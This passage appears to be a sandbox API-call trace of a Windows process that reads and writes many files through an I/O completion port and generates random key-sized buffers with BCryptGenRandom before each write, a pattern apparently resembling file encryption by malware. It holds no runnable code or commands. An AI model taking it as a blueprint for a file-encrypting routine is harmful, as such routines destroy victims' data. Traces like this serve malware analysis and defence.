(in: hFile=0x3ac, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0085.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.362] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.369] CloseHandle (hObject=0x3b8) returned 1 [0085.370] free (_Block=0x1ff1e60) [0085.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.490] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.510] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.532] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.546] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.570] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.588] ReadFile (in: hFile=0x3bc, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x5e02, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0085.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.597] WriteFile (in: hFile=0x3c4, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0085.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.696] CloseHandle (hObject=0x3c0) returned 1 [0085.696] free (_Block=0x1fb18c0) [0085.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.714] WriteFile (in: hFile=0x3c4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.733] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.737] ReadFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x15f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.746] CloseHandle (hObject=0x3c0) returned 1 [0085.746] free (_Block=0x1fb18c0) [0085.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0085.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0085.763] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.763] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.763] free (_Block=0x1ff1e60) [0085.763] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.763] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.763] free (_Block=0x1ff1e60) [0085.763] free (_Block=0x1ff1930) [0085.763] free (_Block=0x77d800) [0085.763] WriteFile (in: hFile=0x3b8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.833] WriteFile (in: hFile=0x3b8, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0085.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0085.850] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.850] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.850] free (_Block=0x1ff1e60) [0085.850] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.850] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.850] free (_Block=0x1ff1e60) [0085.850] free (_Block=0x1ff1930) [0085.851] free (_Block=0x77d800) [0085.851] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.852] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.877] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.885] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.894] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0085.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0085.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0085.911] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.911] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.911] free (_Block=0x77d800) [0085.911] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0085.911] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0085.911] free (_Block=0x2031ed0) [0085.911] free (_Block=0x2031fe0) [0085.911] free (_Block=0x77d908) [0085.911] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0085.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0085.919] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.919] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.919] free (_Block=0x77d800) [0085.920] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0085.920] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0085.921] free (_Block=0x2031ed0) [0085.921] free (_Block=0x2031fe0) [0085.921] free (_Block=0x77d908) [0085.921] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.938] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x6120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0085.938] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.956] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.371] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.387] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0087.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.407] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.453] CloseHandle (hObject=0x3b8) returned 1 [0087.453] free (_Block=0x1fb18c0) [0087.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.521] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7011c*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.543] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.543] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.543] free (_Block=0x1ff1e60) [0087.543] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.543] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.544] free (_Block=0x1ff1e60) [0087.544] free (_Block=0x1ff1930) [0087.544] free (_Block=0x77d800) [0087.544] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.562] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.562] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.562] free (_Block=0x1ff1e60) [0087.562] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.562] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.562] free (_Block=0x1ff1e60) [0087.562] free (_Block=0x1ff1930) [0087.563] free (_Block=0x77d800) [0087.563] WriteFile (in: hFile=0x3b8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0087.563] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.584] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.584] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.585] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.585] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.585] free (_Block=0x77d800) [0087.585] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.585] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.585] free (_Block=0x1ff1930) [0087.585] free (_Block=0x1ff1a40) [0087.585] free (_Block=0x77d908) [0087.585] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7011c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.597] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.600] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.600] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.600] free (_Block=0x77d800) [0087.600] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0087.600] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0087.600] free (_Block=0x2031ed0) [0087.600] free (_Block=0x2031fe0) [0087.600] free 